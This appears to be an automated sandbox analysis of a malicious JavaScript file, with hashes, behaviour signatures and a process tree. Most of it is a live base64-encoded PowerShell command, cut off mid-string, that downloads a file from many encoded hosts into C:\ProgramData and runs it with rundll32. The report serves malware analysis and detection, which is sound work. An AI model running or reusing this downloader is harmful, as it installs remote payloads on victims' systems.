bf08149410bcadcd52fb70237dee58e405931dff77d9e3b4f9e202d8a0e2b8ed

General

Target

5tEPXlW3E7RA5q.js
Size

599KB
MD5

a221e96536e1c34ab130834f2ea385d5
SHA1

2cd69ce0e2a819e16c834a2920b312029935b7d3
SHA256

bf08149410bcadcd52fb70237dee58e405931dff77d9e3b4f9e202d8a0e2b8ed
SHA512

a0d17917a31af1061c4c34d6420b00789ca1d4118c1c83e8c677123361e968fb9caaf232219f06d1cedc615dde9fb6bb6ddc75a823dc493099e945325d327739
SSDEEP

12288:8WGJKxqUwYJpnwhdIhiZAwIQ4Cj8kA4dywL0u+p+fm3DB29vRQIXQrQHRtzggoj3:8uZ9KCkHR5ggoo5vuDf2Ag//nt0n4GrV

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
16	1196	powershell.exe
33	1196	powershell.exe
35	1196	powershell.exe
37	1196	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1196	powershell.exe
1196	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1196	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 5032 wrote to memory of 1196	5032	wscript.exe	85
PID 5032 wrote to memory of 1196	5032	wscript.exe	85

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\5tEPXlW3E7RA5q.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB0AHUAcABlAGwAbwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGsAQQBNAHcAQQB1AEEARABJAEEATgBBAEEAegBBAEMANABBAE4AdwBBADEAQQBBAD0APQBNAGcAVwBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQARQBBAEwAZwBBAHgAQQBEAFUAQQBNAGcAQQA9AE0AZwBXAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBTAEEARwBFAEEAZABBAEIAdwBBAEgASQBBAGIAdwBCAHYAQQBHAFkAQQBVAHcAQgB2AEEASABVAEEAYgBBAEIAcwBBAEcAVQBBAGMAdwBCAHoAQQBHAHcAQQBlAFEAQQB1AEEASABNAEEAYgB3AEIAagBBAEcATQBBAFoAUQBCAHkAQQBBAD0APQAiADsAJABBAHMAdAByAGkAbgBnAGkAbgBnAFMAdABvAG8AZwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAMQBBAEMANABBAE0AZwBBAHkAQQBEAEkAQQBMAGcAQQAwAEEARABrAEEATABnAEEAeQBBAEQAUQBBAE4AQQBBAD0AaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAEEAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAawBBAEwAZwBBADAAQQBEAGcAQQBMAGcAQQB5AEEARABBAEEATwBRAEEAPQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADIAQQBHADgAQQBZAHcAQgBoAEEARwA0AEEAWgBBAEIAcABBAEYATQBBAGIAdwBCAHkAQQBHAEkAQQBiAHcAQgBzAEEAQwA0AEEAZABBAEIAbABBAEcATQBBAGEAQQBCAHUAQQBHADgAQQBiAEEAQgB2AEEARwBjAEEAZQBRAEEAPQAiADsAJABHAHIAYQBjAGkAbABpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGEAUQBCAGkAQQBHAFUAQQBiAEEAQgBzAEEASABVAEEAYgBBAEIAcABBAEcAUQBBAEwAZwBCAHoAQQBHAHMAQQBhAFEAQQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQARQBBAE8AQQBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABjAEEATABnAEEAeQBBAEQAVQBBAE0AQQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBZAFEAQgB5AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFEAUQBCAHAAQQBIAFEAQQBZAHcAQgBvAEEARwBVAEEAYwB3AEEAdQBBAEcASQBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABGAGEAcgBjAGkAYwBhAGwAbAB5AFMAYQBjAHIAYQBtAGUAbgB0AGEAcgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgBRAEIAdQBBAEcAawBBAGIAdwBCAGkAQQBIAEkAQQBZAFEAQgB1AEEARwBNAEEAYQBBAEIAcABBAEcARQBBAGQAQQBCAGwAQQBFAGMAQQBaAFEAQgB6AEEASABRAEEAWQBRAEIAcwBBAEgAUQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgAwAEEARwA4AEEAWgBBAEIAaABBAEgAawBBAEwAdwBBADMAQQBGAEEAQQBhAGcAQQB2AEEARgBBAEEAZAB3AEEAPQBxAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAzAEEARABBAEEATABnAEEAeQBBAEQAVQBBAE4AQQBBAHUAQQBEAEkAQQBNAFEAQQAwAEEAQwA0AEEATgBRAEEAMwBBAEMAOABBAFUAUQBCAEcAQQBFAEUAQQBMAHcAQgBrAEEARQAwAEEAUQB3AEEAPQBxAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATQBnAEEAdQBBAEQASQBBAE4AUQBBAHkAQQBDADQAQQBNAFEAQQAzAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AQQBBAHYAQQBEAGsAQQBhAGcAQgBXAEEARABZAEEAYgBBAEEAMwBBAEMAOABBAGUAZwBBADUAQQBIAFEAQQBNAGcAQgA0AEEARQBZAEEAUwB3AEEANABBAEUAYwBBAHEAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABrAEEATQBRAEEAdgBBAEgAbwBBAGIAZwBCADQAQQBHAHcAQQBWAHcAQQB2AEEASABrAEEAUQB3AEIAbABBAEcAUQBBAGUAUQBCADYAQQBEAGsAQQBTAFEAQQA9AHEAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQB5AEEARABNAEEATQB3AEEAdgBBAEgARQBBAE0AZwBCAE4AQQBFAHMAQQBMAHcAQgBvAEEARwBrAEEAUQBnAEIAdwBBAEgAbwBBAGMAdwBBAD0AIgA7ACQATQBlAHQAbwBjAGgAbwB1AHMASgBlAHQAbwBuAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHADgAQQBhAHcAQgB2AEEARwAwAEEAYgB3AEIAdgBBAEUAcwBBAFoAUQBCADUAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEcANABBAFoAdwBCAHYAQQBBAD0APQBuAG4AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAGMAQQBiAHcAQgB2AEEARwAwAEEAWgBRAEIAeQBBAEcARQBBAGEAQQBCAEoAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYgBBAEIAdgBBAEcATQBBAGQAUQBCADAAQQBIAEkAQQBaAFEAQgB6AEEASABNAEEAWgBRAEIAegBBAEMANABBAFkAZwBCADYAQQBHAGcAQQAiADsAJAByAGUAcwB0AHAAcgBvAG8AZgBVAG4AYgBvAHMAbwBtAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBPAFEAQQB1AEEARABFAEEATQB3AEEAMQBBAEMANABBAE8AUQBBAHcAQQBDADQAQQBPAFEAQQB5AEEAQQA9AD0AIgA7ACQAcABoAG8AdABvAGIAaQBvAGcAcgBhAHAAaAB5AFYAYQByAGkAbwBsAGkAegBhAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAEUAQQBMAGcAQQAxAEEARABVAEEATABnAEEAeABBAEQAQQBBAE4AdwBBAHUAQQBEAGsAQQBNAGcAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHAAbwByAHQAZQByAHMAaABpAHAATABpAHMAdABlAG4AYQBiAGwAZQAgAGkAbgAgACQARgBhAHIAYwBpAGMAYQBsAGwAeQBTAGEAYwByAGEAbQBlAG4AdABhAHIAeQAgAC0AcwBwAGwAaQB0ACAAIgBxAFAAIgApACAAewAkAGMAYQByAGkAcwBzAGEATwB2AGUAcgBtAGEAcgBjAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQAzAEEAQwA0AEEATQBRAEEAegBBAEQAVQBBAEwAZwBBAHkAQQBEAEkAQQBNAFEAQQB1AEEARABJAEEATgBBAEEANQBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJABDAGgAYQByAGcAZQBhAGIAaQBsAGkAdAB5AE8AdgBlAHIAZgBvAHIAbQBhAGwAaQB6AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQB3AEEAWgBRAEIAaABBAEgAUQBBAGEAQQBCAGwAQQBIAEkAQQBhAFEAQgB1AEEARwBVAEEATABnAEIAaABBAEcAYwBBAFoAUQBCAHUAQQBHAE0AQQBlAFEAQQA9ACIAOwAkAGwAaQBhAGkAcwBlAGQAVwBhAHQAdABsAGUAdwBvAHIAawAgAD0AIAAkAHAAbwByAHQAZQByAHMAaABpAHAATABpAHMAdABlAG4AYQBiAGwAZQA7ACQAYwBhAG0AYQByAGEAQQB0AG8AbQBpAHQAeQAgAD0AIAAiAGMAQQBCAGgAQQBIAEkAQQBaAEEAQgBoAEEARwBnAEEATABnAEIAawBBAEcAdwBBAGIAQQBBAD0AIgA7ACQAUgBlAHQAcgBvAG0AbwByAHAAaABvAHMAaQBzAE4AZQBjAGsAbABlAHMAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABsAGkAYQBpAHMAZQBkAFcAYQB0AHQAbABlAHcAbwByAGsAKQApADsAJABDAGgAcgBvAG0AbwBjAG8AbABsAG8AZwByAGEAcABoAGkAYwBDAGEAYgBpAG4AZQB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGMAYQBtAGEAcgBhAEEAdABvAG0AaQB0AHkAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABSAGUAdAByAG8AbQBvAHIAcABoAG8AcwBpAHMATgBlAGMAawBsAGUAcwBzACAALQBPACAAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABcACQAQwBoAHIAbwBtAG8AYwBvAGwAbABvAGcAcgBhAHAAaABpAGMAQwBhAGIAaQBuAGUAdAA7ACQAQwBoAGEAcgBnAGUAYQBiAGkAbABpAHQAeQBPAHYAZQByAGYAbwByAG0AYQBsAGkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAFoAUQBCAGgAQQBIAFEAQQBhAEEAQgBsAEEASABJAEEAYQBRAEIAdQBBAEcAVQBBAEwAZwBCAGgAQQBHAGMAQQBaAFEAQgB1AEEARwBNAEEAZQBRAEEAPQAiADsAJABwAHIAZQBhAGwAbABvAGMAYQB0AGUAZAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXAAkAEMAaAByAG8AbQBvAGMAbwBsAGwAbwBnAHIAYQBwAGgAaQBjAEMAYQBiAGkAbgBlAHQAKQAuAEwAZQBuAGcAdABoADsAJAB2AGkAcwBjAGkAZABpAHoAZQBPAGMAdABlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAWQBBAE0AZwBBAHUAQQBEAEUAQQBNAFEAQQA1AEEAQwA0AEEATQBnAEEAegBBAEQARQBBAEwAZwBBAHgAQQBEAFkAQQBPAFEAQQA9ACIAOwAkAEMAeQB0AG8AegB6AG8AYQBQAGwAdQBjAGsAZQByAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBmAFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AUQBBADIAQQBEAEEAQQBMAGcAQQA1AEEARABBAEEATABnAEEAMwBBAEQAWQBBACIAOwAkAEEAbgB0AGgAZQBjAG8AbABvAGcAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEEAQQBiAHcAQgBzAEEASABrAEEAYwB3AEIANQBBAEcANABBAFkAUQBCAHcAQQBIAFEAQQBhAFEAQgBqAEEARQB3AEEAYgB3AEIAdQBBAEcAYwBBAGEAQQBCAGwAQQBHAEUAQQBaAEEAQgBsAEEARwBRAEEATABnAEIAawBBAEcAawBBAGMAdwBCAGoAQQBHADgAQQBkAFEAQgB1AEEASABRAEEAZgBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQB5AEEARABnAEEATABnAEEAMQBBAEQAWQBBAEwAZwBBADQAQQBEAGcAQQAiADsAaQBmACAAKAAkAHAAcgBlAGEAbABsAG8AYwBhAHQAZQBkACAALQBnAGUAIAA3ADUAMAAxADcAKQB7ACQARQB4AGUAcgB0AGUAZABSAGUAdAByAGEAaQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATABnAEEAeABBAEQAQQBBAE8AQQBBAD0AdwBFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AUQBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBRAEEAegBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AHcARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABrAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQB5AEEARABFAEEAIgA7ACQATQBlAHMAbwBnAG4AYQB0AGgAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBZAFEAQgB5AEEARwBNAEEAYgB3AEIAbgBBAEgAawBBAGMAQQBCAHoAQQBFAGcAQQBlAFEAQgBrAEEASABJAEEAYgB3AEIAbgBBAEcAVQBBAGIAZwBCAHYAQQBHADAAQQBiAHcAQgB1AEEARwBFAEEAYwB3AEEAdQBBAEcAYwBBAGEAUQBCAG0AQQBIAFEAQQBXAGEASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBADIAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATQBnAEEAPQBXAGEASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHAHcAQQBhAFEAQgB0AEEARwBVAEEAYgBnAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBaAGcAQgAxAEEASABJAEEAYgBnAEIAcABBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQAiADsAJABQAGUAZABpAG0AYQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAGcAQQB1AEEARABFAEEATgBRAEEAMQBBAEMANABBAE0AUQBBADQAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEAagBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAYwBBAE8AUQBBAHUAQQBEAFUAQQBNAGcAQQB1AEEARABJAEEATQBRAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFUAQQBqAFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEASABNAEEAYwBBAEIAcABBAEgASQBBAFoAUQBCAGsAQQBDADQAQQBjAEEAQgB5AEEARwBVAEEAYwB3AEIAegBBAEEAPQA9AGoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGsAQQBOAEEAQQB1AEEARABFAEEATgB3AEEAMgBBAEMANABBAE0AUQBBADMAQQBEAE0AQQBMAGcAQQA0AEEARABnAEEAIgA7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIASgBBAEIASABBAEcARQBBAGIAQQBCAGgAQQBHAE0AQQBkAEEAQgB2AEEARwBRAEEAWgBRAEIAdQBBAEgATQBBAGEAUQBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEAUgBnAEIAcABBAEcASQBBAGMAZwBCAHYAQQBHAE0AQQBlAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEMAQQBBAFAAUQBBAGcAQQBDAEkAQQBjAHcAQgBwAEEASABBAEEAYQBBAEIAdgBBAEcANABBAGEAUQBCAG0AQQBHADgAQQBjAGcAQgB0AEEARQAwAEEAWgBRAEIAdABBAEcASQBBAFoAUQBCAHkAQQBIAE0AQQBhAEEAQgBwAEEASABBAEEAYwB3AEEAaQBBAEQAcwBBAEoAQQBCAE0AQQBHAFUAQQBaAHcAQgBwAEEASABRAEEAYQBRAEIAdABBAEcARQBBAGQAQQBCAHAAQQBIAG8AQQBaAFEAQgBVAEEARwBnAEEAWgBRAEIAdgBBAEcAdwBBAGIAdwBCAG4AQQBHAGsAQQBjAHcAQgBsAEEARwBRAEEASQBBAEEAOQBBAEMAQQBBAEkAZwBCAGwAQQBHAE0AQQBhAEEAQgBwAEEARwA0AEEAYgB3AEIAawBBAEcAVQBBAGMAZwBCAHQAQQBHAGsAQQBZAHcAQQBpAEEARABzAEEASgBBAEIAaQBBAEcARQBBAGMAZwBCAHkAQQBHADgAQQBiAHcAQgB0AEEASABNAEEAUQB3AEIAbwBBAEcAdwBBAGIAdwBCAHkAQQBHADgAQQBhAFEAQgB2AEEARwBRAEEAYQBRAEIAawBBAEcAVQBBAEkAQQBBADkAQQBDAEEAQQBJAGcAQgBoAEEARwA0AEEAWgBBAEIAeQBBAEcAOABBAGIAZwBCAHAAQQBHAE0AQQBkAFEAQgB6AEEARgBVAEEAYgBnAEIAbQBBAEcAdwBBAGUAUQBCAHAAQQBHADQAQQBaAHcAQQBpAEEARABzAEEASgBBAEIARgBBAEcANABBAGIAQQBCAGwAQQBHAEUAQQBaAHcAQgAxAEEARwBVAEEASQBBAEEAOQBBAEMAQQBBAEkAZwBCAG4AQQBIAEkAQQBhAFEAQgB3AEEASABBAEEAWgBRAEIAegBBAEMASQBBAE8AdwBCAGoAQQBHADAAQQBaAEEAQQBnAEEAQwA4AEEAWQB3AEEAZwBBAEgASQBBAGQAUQBCAHUAQQBHAFEAQQBiAEEAQgBzAEEARABNAEEATQBnAEEAZwBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEASABBAEEAWQBRAEIAeQBBAEcAUQBBAFkAUQBCAG8AQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQBKAEEAQgBSAEEASABVAEEAWQBRAEIAagBBAEcAcwBBAGEAUQBCAHoAQQBHADAAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAaQBBAEUARQBBAGIAZwBCAHAAQQBIAE0AQQBiAHcAQgBuAEEARwBVAEEAYgBnAEIANQBBAEYATQBBAFoAUQBCADIAQQBHAFUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAaQBBAEQAcwBBAEoAQQBCAGgAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAYgB3AEIAcABBAEcAUQBBAFkAUQBCAHMAQQBDAEEAQQBQAFEAQQBnAEEAQwBJAEEAVQB3AEIAbABBAEcAMABBAGIAdwBCADEAQQBHAHcAQQBaAFEAQQBpAEEARABzAEEAIgA7ACQAYwB1AGQAdwBlAGUAZABzAFcAbwBlAG4AZQBzAHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAMABBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQAVQBBAE4AZwBBAD0AVgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBHAE0AQQBkAEEAQgAxAEEASABBAEEAYgBBAEIAbABBAEgAZwBBAFIAdwBCAHMAQQBHADgAQQBjAHcAQgB6AEEARwA4AEEAWQB3AEIAdgBBAEcAMABBAGIAdwBCAHUAQQBDADQAQQBaAHcAQgBwAEEARwBZAEEAZABBAEEAPQBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcASQBBAFkAUQBCAGkAQQBIAGsAQQBhAFEAQgB6AEEARwBnAEEAYgBnAEIAbABBAEgATQBBAGMAdwBCAFYAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAWgBBAEIAMQBBAEcATQBBAFoAUQBCAGsAQQBDADQAQQBkAFEAQgB6AEEAQQA9AD0AVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAFUAQQBkAFEAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAawBBAGIAUQBCAEIAQQBIAE0AQQBZAHcAQgBwAEEASABRAEEAYQBRAEIAagBBAEcARQBBAGIAQQBBAHUAQQBHAEkAQQBZAFEAQgB5AEEARwBjAEEAWQBRAEIAcABBAEcANABBAGMAdwBBAD0AIgA7ACQASQByAHIAZQBnAHUAbABhAHIAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQAwAEEARABNAEEATABnAEEAeABBAEQAVQBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQB4AEEAQQA9AD0ASwBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUABBAEgAVQBBAGQAQQBCAHAAQQBIAE0AQQBjAHcAQgAxAEEARwBrAEEAYgBnAEIAbgBBAEMANABBAFkAZwBCAHMAQQBHADgAQQBaAHcAQQA9AEsAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAYwBBAEwAZwBBADQAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQAiADsAJABEAGkAbgBuAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEgAawBBAGMAQQBCAGwAQQBIAEkAQQBZAHcAQgA1AEEASABRAEEAYQBBAEIAbABBAEcAMABBAGEAUQBCAGgAQQBFADgAQQBkAFEAQgAwAEEARwB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBHAFUAQQBiAGcAQQB1AEEASABRAEEAZABnAEEAPQB6AHgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEANABBAEMANABBAE4AdwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABRAEEATABnAEEAeABBAEQARQBBAE0AUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AIABlAGwAcwBlACAAewAkAFQAZQB0AHIAYQBuAGkAdAByAG8ATQBhAHIAaQBhAGMAaABpACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAFoAUQBCAHUAQQBHAFUAQQBMAGcAQgAwAEEARwBFAEEAZQBBAEIAcABBAEEAPQA9AEwAcwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAOABBAGEAUQBCADAAQQBIAEkAQQBZAFEAQgBzAEEAQwA0AEEAYwB3AEIAbwBBAEEAPQA9AEwAcwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEgAQQBBAGMAZwBCAHYAQQBIAE0AQQBaAFEAQQB1AEEARwBRAEEAYQBRAEIAegBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQQA9ACIAOwAkAFIAZQBjAGgAYQByAGcAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBFAEEAWQB3AEIAeABBAEgAVQBBAFoAUQBCAHkAQQBHAFUAQQBZAFEAQgAxAEEAQwA0AEEAYQBRAEIAdABBAEcAMABBAGIAdwBCAGkAQQBHAGsAQQBiAEEAQgBwAEEARwBVAEEAYgBnAEEAPQB0AGoAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQA0AEEAQwA0AEEATQBRAEEAeABBAEQARQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABjAEEATQB3AEEAPQB0AGoAcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE8AQQBHADgAQQBjAGcAQgAwAEEARwBnAEEAYgBBAEIAaABBAEcANABBAFoAQQBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAIgA7ACQAUgBlAGkAbABsAHUAcwB0AHIAYQB0AGUAZABNAGUAcwBlAG4AdABlAHIAaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAZABBAEIAaABBAEcANABBAGEAdwBCAHAAQ